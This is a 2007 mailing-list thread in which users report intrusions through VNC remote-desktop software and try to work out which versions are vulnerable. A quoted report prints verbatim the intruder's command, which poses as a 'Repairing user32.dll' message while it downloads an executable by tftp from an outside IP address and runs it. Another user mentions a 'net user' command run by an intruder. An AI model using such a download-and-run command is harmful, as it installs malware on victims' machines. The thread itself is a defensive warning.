Hi, The same thing happened to me and stopped using RealVNC. I have my firewall enabled and I changed the port that VNC uses, however, one day I came home and surprisingly found a cmd windows open and a command like this was excecuted: net user I saw the VNC log and there was a connection some hours ago. Mauricio Jancic Janso Desarrollos Microchip Certified Consultant www.janso.com.ar info@janso.com.ar (54) 11-4502-2983 > -----Original Message----- > From: piclist-bounces@MIT.EDU [mailto:piclist-bounces@MIT.EDU] On > Behalf Of Russell McMahon > Sent: Friday, April 13, 2007 08:41 > To: PIC List > Subject: [OT]:: VNC heads up <- Fw: intrusion? / VNC users only. > > > Don't use VNC (or know what it is)* ? - ignore this > > __________ > > I don't know whether this is significant but it sounds so. > VNC users may wish to take note. > > > Russell > > _______________________ > > >>>>> Eusebio wrote: > > > My pc (xp pro sp2) is usually on and connected, and I often use > > tight-vnc, everything OK till I found this (see image) > > > > Someone executed this code: %comspec% /c echo Repairing user32.dll > > echo Please wait... & tftp -i 64.79.213.12 GET > > jijrtyw.exe & start jijrtyw& > > > > as a server address in 'TightVNC Viewer', appears an error message: > > "Failed to get server address" > > > > but a cmd.exe window was open and that code was executed > > I'm trying to investigate this issue, but I do not understand yet how > that could be possible. > > Do you have other VNC versions installed? Specifically, could it be > possible that you run RealVNC's version 4.1.1? > > While searching the Internet, I was able to find a number of reports > similar to this one (even the IP address was the same in many cases), > but what was strange is that versions and distributions of VNC > software > were different in different reports - TightVNC, UltraVNC, VNC4. > > Another strange thing is that VNC viewer is involved, while VNC server > is needed to connect to the machine. Are both server and viewer > vulnerable? -- I think that's not likely. Looks very strange... > > > -- > http://www.piclist.com PIC/SX FAQ & list archive > View/change your membership options at > http://mailman.mit.edu/mailman/listinfo/piclist -- http://www.piclist.com PIC/SX FAQ & list archive View/change your membership options at http://mailman.mit.edu/mailman/listinfo/piclist